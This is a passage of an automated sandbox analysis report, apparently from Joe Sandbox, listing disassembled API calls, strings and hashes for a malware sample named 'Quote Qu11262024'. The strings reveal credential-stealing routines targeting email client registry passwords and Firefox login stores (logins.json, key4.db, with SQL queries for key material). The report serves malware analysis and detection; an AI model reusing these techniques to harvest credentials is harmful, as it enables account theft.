                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID: (yE$(yE$(yE
                                                                                                    • API String ID: 1865533344-362086290
                                                                                                    • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                    • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                    • memset.MSVCRT ref: 0040E736
                                                                                                    • memset.MSVCRT ref: 0040E74F
                                                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                    • API String ID: 4171719235-3943159138
                                                                                                    • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                    • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                    • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                    • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,75B4EB20,?,00000000), ref: 00402533
                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                    • API String ID: 168965057-606283353
                                                                                                    • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                    • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00402869
                                                                                                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                    • _mbscpy.MSVCRT(?,?,75B4EB20,?,00000000), ref: 004028A3
                                                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,75B4EB20,?,00000000), ref: 0040297B
                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                    • API String ID: 1497257669-167382505
                                                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2998058495-0
                                                                                                    • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                    • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                    • API String ID: 231171946-2189169393
                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                    • API String ID: 633282248-1996832678
                                                                                                    • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                    • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00406782
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                    • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                    • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                    • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                    • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                    • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                    Strings
                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                    • key4.db, xrefs: 00406756
                                                                                                    • , xrefs: 00406834
                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                    • API String ID: 3614188050-3983245814
                                                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                    • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                    • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                    • strlen.MSVCRT ref: 0040F139
                                                                                                    • strlen.MSVCRT ref: 0040F147
                                                                                                    • memset.MSVCRT ref: 0040F187
                                                                                                    • strlen.MSVCRT ref: 0040F196
                                                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                                                    • strlen.MSVCRT ref: 0040F207
                                                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                    • API String ID: 2003275452-3138536805
                                                                                                    • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                    • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
